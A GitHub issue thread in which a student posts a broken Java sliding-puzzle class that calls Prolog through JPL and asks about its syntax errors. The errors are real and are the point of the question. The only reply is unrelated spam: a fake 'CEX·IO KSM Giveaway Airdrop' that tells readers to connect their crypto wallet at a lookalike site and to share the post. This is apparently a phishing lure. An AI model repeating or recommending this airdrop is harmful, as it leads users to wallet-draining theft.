### ISSUE TITLE
Syntax Error

### ISSUE THREAD

**Issue by mdalshorbaji** [maschad/ai_assignment2#1]
public void findSolution(){
        Query.hasSolution("use_module(library(jpl))"); // only because we call e.g. jpl_pl_syntax/1 below
        String t1 = "consult('puzzle.pl')";
        String state ="[";
        for (int r=0; r<ROWS; r++) {
            for (int c=0; c<COLS; c++) {
                state.concat(getFace(r, c)) + "/";
            }
        }
        state.concat("]");
        String q = "find_solution(" + state +",Moves)";
        String moves = Query.oneSolution(q).get("Moves");
        if(moves[1]).equals("right")){
            moveRight(getRow(_emptyTile),getCol(_emptyTile));
        }
        else if(moves[1].equals("left")){
            moveLeft(getRow(_emptyTile),getCol(_emptyTile));
        }
        else if(move[1].equals("up")){
            moveUp(getRow(_emptyTile),getCol(_emptyTile));
        }
        else if(move[1].equals("down")){
            moveDown(getRow(_emptyTile),getCol(_emptyTile));
        }

    }

    public moveRight(int r, int c){
        exchangeTiles(r,c,1,0);
    }//move a tile right

    public moveLeft(int r, int c){}
    public moveDown(int r, int c){}
    public moveUp(int r, int c){}

}//end class SlidePuzzleModel

////////////////////////////////////////////////////////// class Tile
// Represents the individual "tiles" that slide in puzzle.
class Tile {
    //============================================ instance variables
    private int _row;     // row of final position
    private int _col;     // col of final position
    private String _face;  // string to display
    //end instance variables

    //==================================================== constructor
    public Tile(int row, int col, String face) {
        _row = row;
        _col = col;
        _face = face;
    }//end constructor

    //======================================================== setFace
    public void setFace(String newFace) {
        _face = newFace;
    }//end getFace

    //======================================================== getFace
    public String getFace() {
        return _face;
    }//end getFace

    //=============================================== isInFinalPosition
    public boolean isInFinalPosition(int r, int c) {
        return r==_row && c==_col;
    }//end isInFinalPosition
 
    public int getRow(Tile t){
        return t._row;
    }//get row of a tile

    public int getCol(Tile t){
        return t.col;
    }//get column of a tile
}

syntax error in this code on SlodePuzelModel.java classs

**Comment by luispurizacam** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
